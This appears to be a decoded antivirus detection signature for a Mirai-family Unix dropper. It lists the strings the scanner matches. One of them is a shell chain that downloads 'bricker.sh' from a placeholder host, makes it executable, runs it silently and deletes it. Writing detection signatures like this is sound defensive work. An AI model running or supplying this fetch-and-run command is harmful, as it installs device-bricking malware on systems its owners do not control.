VIRUS NAME: Unix.Dropper.Mirai-7135922-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
found open string stage 1"%s" killing now. pid :: %d
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
wget http://ip/bricker.sh -O /opt/bricker.sh > /dev/null 2>&1;chmod +x /opt/bricker.sh > /dev/null 2>&1;/opt/bricker.sh > /dev/n
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
killing found string :: "%s" pid :: %d
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ull 2>&1;rm /opt/bricker.sh > /dev/null 2>&1
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
brickit
